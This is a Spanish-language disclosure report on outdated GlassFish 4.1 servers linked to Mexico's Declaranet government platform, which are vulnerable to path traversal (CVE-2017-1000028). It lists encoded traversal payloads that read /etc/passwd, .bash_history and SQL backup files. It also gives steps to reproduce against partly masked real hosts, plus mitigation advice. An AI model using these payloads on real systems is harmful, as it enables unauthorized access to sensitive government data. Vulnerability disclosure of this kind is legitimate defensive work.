Instancias de Oracle GlassFish Server vulnerables a CVE-2017-1000028 [Declaranet]

 Detalles 

 ==========
Las siguientes ips asociados a la platatorma declaranet:

• 1x8.x.x.2x (axxx.cxxs.gob.mx)
• 1x9.x.x.6x 
  

cuentan con una versión desactualizada de GlassFish server, más especificamente la versión 4.1, la cual tiene vulnerabilidades conocidas y explotables, entre ellas,un path transversal (CVE-2017-1000028), que es la que se abarca en este reporte y que al ser explotada permite a un usuario malintencioado conseguir la lectura de ficheros arbitrarios del servidor remoto.

 

Payloads basicos:
==========================

 
- /etc/hosts -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afhosts/ 

 - /etc/passwd -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd

 

 Pasos para reproducir 

====================== 

1. Abrir el navegador web de tu preferencia 
   
2. Dirigirte a https://148.x.x.2x:4848 o https://axxx.cxxs.gob.mx:4848 
3. Usar cualquiera de las cargas utiles (payloads) proporcionadas más arriba
4. Los ficheros (/etc/hosts o /etc/passwd) son volcados como resultado de la petición via GET 

 

 

PoC1 (148.x.x.2x):

 

Payloads criticos: 

========================== 

Los siguientes payloads son funcionales solo para el host 1x9.x.x.6x que de igual manera cuenta con una instancia de GlassFish en el puerto 4848 y vulnerable a CVE-2017-1000028, sin embargo, como se podra notar en la PoC 2, los datos expuestos son mucho más criticos:

- declaranetpxxsxxxx_x-xx-1x.sql -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afhome%c0%afadmin/xxxxups/declaranetpxxsxxxx_x-xx-1x.sql/

- declaranetxxxxxx.sql -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afhome%c0%afadmin/backups/declaranetxxxxxx/

 - /home/admin/.bash_history -> /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afhome%c0%afadmin/.bash_history/

  

 

 

 

 

Impacto:

 ============ 

 

Como se puede notar en las pruebas de concepto (PoCs) anteriores la vulnerabilidad permite volcar contenido que esta por debajo o por encima del directorio raiz remotamente. 

 

- Fuga de información sensible

 

Mitigación:

============

 

Actualizar a la ultima versión de Oracle GlassFish Server, si esto no es posible se puede recurrir al uso de tecnologías como firewalls de aplicaciones web (WAF) o sistema de prevención de intrusos (IPS) que neutralicen las cargas utiles. 

 

Contacto:

 =============== 

 

- Twitter: @ov3rflow1

 

- Website:https://defconisov3r.github.io/

 

- Email: 1hackable[at]protonmail[dot]com

Referencias: 

===============

- https://www.exploit-db.com/exploits/39441

- https://nvd.nist.gov/vuln/detail/CVE-2017-1000028